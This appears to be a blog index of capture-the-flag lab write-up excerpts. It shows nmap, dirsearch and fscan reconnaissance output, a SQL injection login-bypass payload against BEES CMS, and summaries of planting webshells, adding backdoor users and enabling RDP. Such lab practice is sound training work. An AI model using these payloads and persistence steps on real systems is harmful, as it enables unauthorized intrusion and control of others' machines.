vulntarget-a

Nmap

[root@Hacking] /home/kali/vulntarget-a ❯ nmap 192.168.237.132 -A

PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:99:58:97 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-09-04T10:23:53+08:00
| smb2-time:
|   date: 2025-09-04T02:23:53
|_  start_date: 2025-09-04T02:22:36
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.237.132

Dirsearch

[root@Hacking] /home/kali/vulntarget-a ❯ dirsearch -u 'http://192.168.237.132/'

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.237.132/

[10:37:07] Scanning:
[10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/
[10:37:11] 403 - 564B - /api/
[10:37:11] 403 - 564B - /attachment.asp
[10:37:11] 403 - 564B - /attachment.aspx
[10:37:11] 403 - 564B - /attachment.jsp
[10:37:11] 403 - 564B - /attachment.html
[10:37:11] 403 - 564B - /attachment.htm
[10:37:11] 403 - 564B - /attachmentedit.asp
[10:37:11] 403 - 564B - /attachmentedit.aspx
[10:37:11] 403 - 564B - /attachmentedit.html
[10:37:11] 403 - 564B - /attachmentedit.jsp
[10:37:11] 403 - 564B - /attachmentedit.htm
[10:37:11] 403 - 564B - /attachments
[10:37:11] 403 - 564B - /attachments.aspx
[10:37:11] 403 - 564B - /attachments.jsp
[10:37:11] 403 - 564B - /attachments.html
[10:37:11] 403 - 564B - /attachments.htm
[10:37:11] 403 - 564B - /attachments.asp
[10:37:13] 200 - 894B - /favicon.ico
[10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/
[10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/
[10:37:14] 403 - 564B - /./images/
[10:37:14] 403 - 564B - /./images/Sym.php
[10:37:14] 403 - 564B - /./images/c99.php
[10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/
[10:37:14] 403 - 564B - /inc/
[10:37:14] 200 - 10KB - /index.php
[10:37:14] 400 - 166B - /index.php::$DATA
[10:37:14] 200 - 10KB - /index.php.
[10:37:14] 200 - 10KB - /index.pHp
[10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/
[10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/
[10:37:17] 200 - 26B - /robots.txt
[10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/
[10:37:17] 200 - 0B - /share/
[10:37:17] 200 - 2KB - /portal/
[10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/
[10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/
[10:37:18] 403 - 564B - /templates/beez/index.php
[10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php
[10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php
[10:37:18] 400 - 166B - /Trace.axd::$DATA
[10:37:19] 400 - 166B - /web.config::$DATA
[10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/

Task Completed

I changed the IP in what follows, because some tools do not work well on Kali ...

2025-09-04 · 3 min · 1258 words · HYH

Cyberstrikelab-Lab7

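BageCMS

fscan found a CMS running on port 9652, most likely version 3.1. Go to /index.php?r=admini and log in to the admin panel with the weak password admin/admin123456, then edit a template to add a one-line webshell. Connect with AntSword and get flag1 in the root directory. Enable RDP and add a backdoor user ...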

2025-07-21 · 1 min · 312 words · HYH

Cyberstrikelab-Lab5

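BEES CMS

fscan found port 6582. After some searching, the username field of the admin login turned out to be vulnerable to SQL injection. Forge a login with a UNION injection:

user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0

Upload a file in the admin panel. The connection succeeds, and flag1 is in the root directory. Bring the host online in CS, enable RDP, and add a backdoor user ...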

2025-07-20 · 1 min · 298 words · HYH

Cyberstrikelab-Lab4

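BlueCMS

fscan found port 192.168.10.10:5820 open and running Bluecms, version v1.6. Go to the /admin administrator login page; a weak-password attempt succeeds with admin/admin123456. Go to template management, edit the first template, and capture the request. Add a one-line webshell and change the file name; the connection succeeds, and flag1 is in the root directory. This is already the highest privilege level, so bring the host online in CS directly. Add a backdoor user and enable RDP ...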

2025-07-19 · 1 min · 436 words · HYH

Cyberstrikelab-Lab1

Fscan

[root@Hacking] /home/kali/Desktop ❯ ./fscan -h 192.168.10.10 -p 80

Fscan Version: 2.0.0

[2025-07-16 22:41:57] [INFO] 暴力破解线程数: 1
[2025-07-16 22:41:57] [INFO] 开始信息扫描
[2025-07-16 22:41:57] [INFO] 最终有效主机数量: 1
[2025-07-16 22:41:57] [INFO] 开始主机扫描
[2025-07-16 22:41:57] [INFO] 有效端口数量: 1
[2025-07-16 22:41:57] [SUCCESS] 端口开放 192.168.10.10:80
[2025-07-16 22:42:03] [SUCCESS] 服务识别 192.168.10.10:80 => [http]
[2025-07-16 22:42:03] [INFO] 存活端口数量: 1
[2025-07-16 22:42:03] [INFO] 开始漏洞扫描
[2025-07-16 22:42:03] [INFO] 加载的插件: webpoc, webtitle
[2025-07-16 22:42:04] [SUCCESS] 网站标题 http://192.168.10.10 状态码:200 长度:25157 标题:易优CMS - Powered by Eyoucms.com
[2025-07-16 22:42:11] [SUCCESS] 目标: http://192.168.10.10:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-07-16 22:42:14] [SUCCESS] 扫描已完成: 2/2

The scan found a ThinkPHP RCE vulnerability ...

2025-07-17 · 3 min · 1099 words · HYH